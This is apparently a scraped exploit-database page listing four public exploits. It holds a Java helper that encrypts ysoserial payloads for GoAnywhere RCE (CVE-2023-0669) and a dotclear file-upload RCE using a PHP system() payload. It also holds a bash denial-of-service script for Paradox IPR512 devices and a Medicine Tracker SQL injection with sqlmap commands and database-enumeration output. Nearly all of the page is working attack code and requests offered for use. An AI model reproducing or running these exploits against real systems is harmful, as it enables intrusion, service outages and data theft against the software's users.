Latest exploits :: CodePwn

<pre><code>// Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE) // Google Dork: title:"GoAnywhere" // Date: 3/26/2023 // Exploit Author: Youssef Muhammad // Vendor Homepage: https://www.goanywhere.com/ // Software Link: https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0 // Version: > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux // CVE : CVE-2023-0669 // This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64; import javax.crypto.Cipher; import java.nio.charset.StandardCharsets; import javax.crypto.SecretKeyFactory; import javax.crypto.spec.PBEKeySpec; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; import java.nio.file.Files; import java.nio.file.Paths; public class CVE_2023_0669_helper { static String ALGORITHM = "AES/CBC/PKCS5Padding"; static byte[] KEY = new byte[30]; static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8); public static void main(String[] args) throws Exception { if (args.length != 2) { System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>"); System.exit(1); } String filePath = args[0]; String version = args[1]; byte[] fileContent = Files.readAllBytes(Paths.get(filePath)); String encryptedContent = encrypt(fileContent, version); System.out.println(encryptedContent); } public static String encrypt(byte[] data, String version) throws Exception { Cipher cipher = Cipher.getInstance(ALGORITHM); KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue(); SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES"); IvParameterSpec ivSpec = new IvParameterSpec(IV); cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec); byte[] encryptedObject = cipher.doFinal(data); String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject); String v = (version.equals("2")) ? "$2" : ""; bundle += v; return bundle; } private static byte[] getInitializationValue() throws Exception { // Version 1 Encryption String param1 = "go@nywhereLicenseP@$$wrd"; byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded(); } private static byte[] getInitializationValueV2() throws Exception { // Version 2 Encryption String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R"; byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73}; return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded(); } } </code></pre>

<pre><code>Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated) Application: dotclear Version: 2.25.3 Bugs: Remote Code Execution (RCE) (Authenticated) via file upload Technology: PHP Vendor URL: https://dotclear.org/ Software Link: https://dotclear.org/download Date of found: 08.04.2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC ======================================== While writing a blog post, we know that we can upload images. But php did not allow file upload. This time <?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it. We were able to run the php code when we visited your page poc request: POST /dotclear/admin/post.php HTTP/1.1 Host: localhost Content-Length: 566 Cache-Control: max-age=0 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc Connection: close post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password= poc video : https://youtu.be/oIPyLqLJS70 </code></pre>

<pre><code>#!/bin/bash # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service # Google Dork: intitle:"ipr512 * - login screen" # Date: 09-APR-2023 # Exploit Author: Giorgi Dograshvili # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423) # Version: IPR512 # CVE : CVE-2023-24709 # Function to display banner message display_banner() { echo "******************************************************" echo "* *" echo "* PoC CVE-2023-24709 *" echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *" echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *" echo "* by SlashXzerozero *" echo "* *" echo "******************************************************" } # Call the function to display the banner display_banner echo "" echo "" echo "Please enter a domain name or IP address with or without port" read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain # Step 2: Ask for user confirmation read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm if [[ $confirm == "Y" || $confirm == "y" ]]; then # Display loading animation animation=("|" "/" "-" "\\") index=0 while [[ $index -lt 10 ]]; do echo -ne "Loading ${animation[index]} \r" sleep 1 index=$((index + 1)) done # Use curl to send HTTP GET request with custom headers and timeout response=$(curl -i -s -k -X GET \ -H "Host: $domain" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \ -H "Accept: */" \ -H "Referer: http://$domain/login.html" \ -H "Accept-Encoding: gzip, deflate" \ -H "Accept-Language: en-US,en;q=0.9" \ -H "Connection: close" \ --max-time 10 \ "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982") # Check response for HTTP status code 200 and print result if [[ $response == *"HTTP/1.1 200 OK"* ]]; then echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html" else echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html" fi else echo "The script is stopped!." fi </code></pre>

<pre><code># Exploit Title: Medicine Tracker System v1.0 - Sql Injection # Exploit Author: Sanjay Singh # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip # Version: V1.0.0 # Tested on: Windows/Linux # Proof of Concept: # 1- http://localhost/php-mts/app/login.php # 2- login with default credential # 3- Click left side Manage account and fill Update User Details and click update account # 4- Capture request using burp suite # 5- Save request request.txt Sqlmap POST /php-mts/classes/Users.php?f=save_user HTTP/1.1 Host: localhost Content-Length: 661 sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8" Accept: application/json, text/javascript, */*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/php-mts/app/?page=manage_account Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql Connection: close ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="id" 1'-' ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="firstname" gogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="middlename" ogo ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="lastname" singh ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="username" mayuri.infospace@gmail.com ------WebKitFormBoundaryeOo3CzyRX6fHexZx Content-Disposition: form-data; name="password" 12345678 ------WebKitFormBoundaryeOo3CzyRX6fHexZx-- sqlmap sqlmap -r request.txt -p "id" --dbs --batch ___ __H__ ___ ___["]_____ ___ ___ {1.6.12#stable} |_ -| . ['] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 13:18:01 /2023-03-21/ [13:18:01] [INFO] parsing HTTP request from 'request.txt' it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N [13:18:01] [INFO] resuming back-end DBMS 'mysql' [13:18:01] [INFO] testing connection to the target URL [13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss --- [13:18:01] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.54, PHP 8.0.25 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:18:01] [INFO] fetching database names [13:18:01] [INFO] resumed: 'information_schema' [13:18:01] [INFO] resumed: 'art_gallery' [13:18:01] [INFO] resumed: 'hcpms' [13:18:01] [INFO] resumed: 'mts_db' [13:18:01] [INFO] resumed: 'mysql' [13:18:01] [INFO] resumed: 'performance_schema' [13:18:01] [INFO] resumed: 'phpmyadmin' [13:18:01] [INFO] resumed: 'sscdms_db' [13:18:01] [INFO] resumed: 'test' available databases [9]: [*] art_gallery [*] hcpms [*] information_schema [*] mts_db [*] mysql [*] performance_schema [*] phpmyadmin [*] sscdms_db [*] test [13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2' [*] ending @ 13:18:01 /2023-03-21/ </code></pre>